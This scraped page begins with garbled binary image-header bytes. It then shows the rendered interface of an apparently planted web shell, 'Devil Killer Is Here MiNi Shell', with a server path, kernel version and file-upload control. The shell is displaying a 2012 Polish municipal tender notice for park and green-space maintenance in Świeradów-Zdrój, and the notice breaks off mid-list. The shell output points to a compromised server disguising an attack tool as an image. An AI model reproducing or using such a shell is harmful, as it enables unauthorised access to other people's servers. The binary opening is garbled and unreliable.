JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120329/72155-N-2012.html

<p class="kh_header"><b>Świeradów-Zdrój: Utrzymanie i konserwacja terenów zieleni na terenie Gminy Świeradów-Zdrój</b><br>
<b>Numer ogłoszenia: 72155 - 2012; data zamieszczenia: 29.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja terenów zieleni na terenie Gminy Świeradów-Zdrój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres  rzeczowy  zamówienia  obejmuje  realizację  następujących  grup  prac:
- pielęgnacja  i  konserwacja  zieleni  parkowej i terenów zieleni,
- utrzymanie  i  konserwacja  nawierzchni  ogrodowych oraz budowli, obiektów i urządzeń  ogrodowych   i  elementów  małej  architektury stanowiących wyposażenie   parków, placów zabaw i skwerów itp.
 - utrzymanie  czystości  i  porządku  na  terenie  parków i terenów zieleni. 

Zadanie  1 - Utrzymanie i konserwacja  kompleksu parków Uzdrowiskowych

Kompleks parków uzdrowiskowych w Świeradowie - Zdroju położony jest w sercu miejscowości i stanowi bezpośrednie otoczenie Domu Zdrojowego. Zajmuje obszar 7,6 ha. Zespół parkowy powstał na pocz. XX wieku. Przedmiotowe parki, stanowią najcenniejszy element, zorganizowanej zieleni miejskiej w Świeradowie - Zdroju. Spełniają one szereg funkcji kulturowych, użytkowo - wypoczynkowych, zdrowotnych i estetycznych. W latach 2010-2011 przeprowadzona była na terenie parków ich rewitalizacja za łączną kwotę ok 5,3 miliona złotych. Parki podlegają prawnej ochronie Dolnośląskiego Wojewódzkiego  Konserwatora Zabytków.  Obiekty te, ze względu na cenną i urozmaiconą szatę roślinną i  bogate wyposażenie, wymagają szczególnej troski w zakresie ich pielęgnacji, konserwacji i bieżącego utrzymania. Zakłada  się jednakowy, wysoki standard prac utrzymaniowych we wszystkich częściach parku.
Zadanie  2 -  Utrzymanie i konserwacja terenów zieleni 
 
Przedmiot zamówienia obejmuje wykonanie usługi polegającej na bieżącym utrzymaniu terenów zieleni miejskiej w Świeradowie - Zdroju. Z uwagi, iż w dniu 28.02.1980 roku UKŁAD URBANISTYCZNY MIASTA ŚWIERADÓW - ZDRÓJ wpisany został do rejestru zabytków - nr 336/612/J, w nawiązaniu   do wymaganych warunków zawartych w Rozporządzeniu Ministra Kultury z dnia 9 czerwca 2004 roku w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych narzuca się szczegółowe warunki przy pracach pielęgnacyjnych przy zieleni miejskiej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 50% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju, które mogą dotyczyć:            
wykonania tego samego rodzaju usług z grupy: prac porządkowych i ogrodniczych oraz konserwacji małej architektury, które zostały ujęte w opisie przedmiotu zamówienia zawartym w SIWZ dla zamówienia podstawowego, gdy zachodzi potrzeba ich wykonania w ilości wykraczającej  poza ilość przyjętą  w  opisie przedmiotu zamówienia  lub  gdy  będą one wykonywane na terenach zieleni miejskiej  w  lokalizacjach nie ujętych w SIWZ dla zamówienia podstawowego,
 opróżnianie koszy ulicznych na terenach zieleni miejskiej w  lokalizacjach ujętych w SIWZ dla zamówienia podstawowego, 
zimowe utrzymanie wybranych ulic, chodników, placów i schodów terenowych położonych w obrębie parku oraz przylegających do tych obiektów,
nasadzenia drzew, krzewów, bylin, roślin cebulowych i roślin jednorocznych w  lokalizacjach ujętych i nie ujętych w SIWZ dla zamówienia podstawowego. 
- prace porządkowe wybranych ulic, chodników, placów i schodów terenowych położonych w obrębie parku oraz przylegających do tych obiektów, które nie zostały ujęte w opisie przedmiotu zamówienia zawartym w SIWZ dla zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.31.00.00-6, 77.31.20.00-0, 77.31.21.00-1, 77.31.30.00-7, 77.31.41.00-5, 77.34.20.00-9, 90.51.13.00-5, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium  w następującej wysokości: 
a)zadanie 1- 2.000,00 zł (słownie złotych: dwa   tysiące  00/100),
b)zadanie 2- 1.000,00 zł (słownie złotych: jeden tysiąc 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy PZP. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ, W celu potwierdzenia, że Wykonawca spełnia warunek nr 2 należy przedłożyć a)w stosunku do osób fizycznych : Oświadczenie o spełnianiu warunków określonych w art. 24 ust.1 ustawy Prawo Zamówień Publicznych , b) w stosunku do pozostałych podmiotów : -aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert Oświadczenie w zakresie art. 24 ust. 1 ustawy PrawoZamówień Publicznych Wykonawca spełnia warunek nr 2 jeżeli przedłoży : w stosunku do osób fizycznych -oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 3 do SIWZ, w stosunku do pozostałych podmiotów-aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert oraz ,Oświadczenie o spełnianiu warunków określonych w art. 24 ust.1 ustawy Prawo Zamówień Publicznych, Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 3 ustawy PZP. Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające , że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, Wykonawca spełnia warunek nr 3 jeżeli przedłoży dokument wystawiony przez uprawniony organ, wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert. Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające , że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, Wykonawca spełnia warunek nr 4 jeżeli przedłoży dokument wystawiony przez uprawniony organ, wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY WYŁĄCZNIE ZADANIA 1 Utrzymanie i konserwacja kompleksu parków Uzdrowiskowych
Warunek posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia  tj.  
wykonania lub wykonywania  
w okresie   ostatnich trzech lat  przed upływem  terminu składania ofert, 
stałej pielęgnacji   
(tj. wykonywania   świadczeń okresowych lub ciągłych) 
parków wpisanych do rejestru zabytków, 
za kwotę łączną 50 000,00 zł brutto,
na łącznej powierzchni minimum 4 ha,  
z zastrzeżeniem, że w przypadku łączenia powierzchni różnych parków- przynajmniej 2 parki były o powierzchni powyżej 1 ha. W celu potwierdzenia, że Wykonawca spełnia warunek
 nr 6 należy przedłożyć
 Wykaz wykonanych lub wykonywanych  świadczeń okresowych lub ciągłych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia okresie ostatnich trzech lat przed upływem terminu składania ofert  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  usłudze  stanowiącej przedmiot zamówienia z podaniem ich   wartości,  przedmiotu, dat   wykonania  i odbiorców  wraz z  załączeniem dokumentów  potwierdzających, że  usługi   zostały  wykonane lub są wykonywane  należycie. 
Wykonawca spełni warunek
 nr 6  jeżeli przedłoży wykaz  o którym mowa  w kol. III zgodne ze wzorem stanowiącym załącznik nr  7 do SIWZ wraz  
  dokumentami  potwierdzającymi , że  usługi  zostały  wykonane lub są wykonywane  należycie.
 
W przypadku gdy Wykonawca polega na zasobach innych podmiotów, niezależnie od charakteru  prawnego łączącego go z nim  stosunków, jest zobowiązany dołączyć  pisemne zobowiązanie  tych podmiotów  do oddania  mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich  przy wykonywaniu zamówienia zawierające minimum następujące informacje: określenie stron, opis powinnego zachowania się podmiotu udostępniającego zasoby, okres udostępnienia zasobów, dokładny opis przekazywanych zasobów. Wykonawca może skorzystać ze wzoru który stanowi załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  dysponowania osobami zdolnymi do wykonania zamówienia   zgodnie z§ 23 Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz.U. z 2011 r. Nr 165, poz. 987)

Wykonawca powinien dysponować następującym personelem:

a) do kierowania robotami-DOTYCZY WYŁĄCZNIE ZADANIA 1 Utrzymanie i konserwacja kompleksu parków Uzdrowiskowych
osobą posiadającą łącznie następujące kwalifikacje i uprawnienia:

a1) tytuł zawodowy magistra lub magistra inżyniera uzyskany po ukończeniu studiów wyższych, obejmujących wiadomości w tym zakresie, 
a2)oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków,

b) do wykonywania prac o charakterze technicznym- Dotyczy zadania 1 i 2
 minimum jedną 
osobą posiadającą jedne  z   następujących kwalifikacji i uprawnień:
b1)  świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy,
b2)  albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni, 
b3) albo odbyła co najmniej 12-miesięczną praktykę zawodową przy pielęgnacji tego rodzaju zabytków wpisanych do rejestru zabytków. 
a) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia poprzez kierowanie  pracami i wykonywanie prac o charakterze technicznym, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami lub pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał osobę/y, którymi będzie dysponował.

b) oświadczenie, że osoby wykazane w wykazie osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia posiadają  wymagane kwalifikacje i doswiadczenie o których mowa w kol. 2 pkt a) i b).
Wykonawca spełni warunek
 nr 5  jeżeli przedłoży wykaz  o którym mowa  w kol. III zgodne ze wzorem stanowiącym załącznik nr  
5 do SIWZ wraz z dokumentami potwierdzającymi posiadanie tytułu prawnego do  dysponowania osobą/ami, który może być przedłożony zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ
 i 
przedłoży  oświadczenie   o którym mowa  w kol. III zgodne ze wzorem stanowiącym załącznik   nr 6 do SIWZ.

W przypadku gdy Wykonawca polega na zasobach osobowych innych podmiotów, niezależnie od charakteru  prawnego łączącego go z nim  stosunków, jest zobowiązany dołączyć  pisemne zobowiązanie  tych podmiotów  do oddania  mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich  przy wykonywaniu zamówienia zawierające minimum następujące informacje: określenie stron, opis powinnego zachowania się podmiotu udostępniającego zasoby, okres udostępnienia zasobów, dokładny opis przekazywanych zasobów. Wykonawca może skorzystać ze wzoru który stanowi załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić w przypadku wystąpienia jednej z poniższych okoliczności: a) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę, b)zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa, c) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zmawiającego, d) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron , e) zmiany siedziby stron, f) nastąpi zmiana konta, g) nastąpi zmiana osób wyznaczonych do kontaktów, zmiany numerów, zmiany adresów środków komunikacji z Zamawiającym, h) zwiększenia powierzchni i zakresu prac powyżej 2%.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2012 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie i konserwacja  kompleksu parków Uzdrowiskowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. UTRZYMANIE ZIELENI

1.1  Pielęgnacja i utrzymanie istniejących rabat bylinowych lub mieszanych,
1.2 Pielęgnacja krzewów i żywopłotów,

1.3. Powierzchnie zieleni: 
Krzewy liściaste - 1601,1 m2
Krzewy iglaste - 117 m2
Rośliny okrywowe - 1 371,9 m2
Rośliny cebulowe wieloletnie - 110,0 m2,
1.4. Wycinka samosiewów drzew nie starszych niż 10 lat (zgodnie z art. 83, ust. 6 pkt 4 ustawy z 16 kwietnia 2004 roku o ochronie przyrody (tekst jednolity Dz. U. Nr 151, poz. 1220 z 2009 roku z późniejszymi zmianami). Szacuje się wycięcie ok 100 m2 w każdym sezonie.
1.5. Utrzymanie trawników zgodnie ze sztuką ogrodniczą,
2. STAŁE UTRZYMANIE PORZĄDKU,2.1 z uwzględnieniem w szczególności prac porządkowych: 
